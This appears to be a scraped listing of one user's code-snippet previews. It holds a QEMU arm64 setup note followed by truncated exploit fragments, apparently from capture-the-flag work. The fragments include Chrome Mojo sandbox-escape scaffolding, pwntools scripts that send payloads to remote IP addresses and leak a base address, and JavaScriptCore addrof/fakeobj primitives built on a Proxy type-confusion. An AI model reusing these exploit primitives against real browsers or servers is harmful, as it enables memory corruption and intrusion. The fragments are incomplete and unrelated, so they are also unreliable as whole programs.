AmesianX

QEMU arm64 cloud server emulation

This is basically a rehash of an original post on CNXSoft - all credit (particularly for the Virtio device arguments used below) belongs to the author of that piece.

Download the latest uefi1.img image. E.g. ubuntu-16.04-server-cloudimg-arm64-uefi1.img from https://cloud-images.ubuntu.com/releases/16.04/release/

Download the UEFI firmware image QEMU_EFI.fd from https://releases.linaro.org/components/kernel/uefi-linaro/latest/release/qemu64/

Determine your current username and get your current ssh public key:

AmesianX

function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } 
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
            new ArrayBuffer(0x1000000);
        }
}
let data_view = new DataView(new ArrayBuffer(8));

AmesianX

<script id="worker1">
    worker:{
        if (typeof window === 'object') break worker;
        self.onmessage = function() {
            console.log("onmessage")
        }
    }
</script>
<script src="../mojo_bindings.js"></script>
<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>

AmesianX

<html>
    <body></body>
        <script src="../mojo/public/js/mojo_bindings.js"></script>
    <script src="../third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
    <script src="../third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
    <script>
        var heap;
        var replace_data;
        var count = 0;
        var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();

AmesianX

from pwn import *

#s = remote("0", 1234)

s = remote("58.229.240.181", 7777)
context.log_level = "debug"
s.recvuntil(">>>")
s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090 
print "BASE @ " + hex(base)

AmesianX

from pwn import *
from ctypes import *

def convert(s):
	return struct.unpack('<d', s)[0]
#s = process("./pwnme")
s = remote("15.164.131.100",9988)
def r(dat):
	s.recvuntil(">")
	s.sendline(dat)

AmesianX

<html>
    <pre id='log'></pre>
    <script src="mojo_bindings.js"></script>
    <script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
    <script src="being_creator_interface.mojom.js"></script>
    <script src="food_interface.mojom.js"></script>
    <script src="dog_interface.mojom.js"></script>
    <script src="person_interface.mojom.js"></script>
    <script src="cat_interface.mojom.js"></script>
    <script>

AmesianX

Per https://code.google.com/p/v8/codesearch#v8/trunk/src/runtime.cc


%CreateSymbol
%CreatePrivateSymbol
%CreateGlobalPrivateSymbol
%NewSymbolWrapper
%SymbolDescription
%SymbolRegistry
%SymbolIsPrivate

AmesianX

load("utils.js")
load("int64.js")

function addrof(obj) {

    let dateObj = new Date();
    dateObj[0] = 1;
    let array = new Array(13.37, 13.37)
    let triggerChange = false;
    Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {

AmesianX

// addrof/fakeobj primitives for qwertyoruiop's jsc bug
var wtf_hack = false, wtf_confuse = null, wtf_obj = {}, wtf_date = new Date();
wtf_date[1] = 1;
Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
  has: function () {
    if (wtf_hack) {
      wtf_confuse[0] = wtf_obj;
    }
  }
});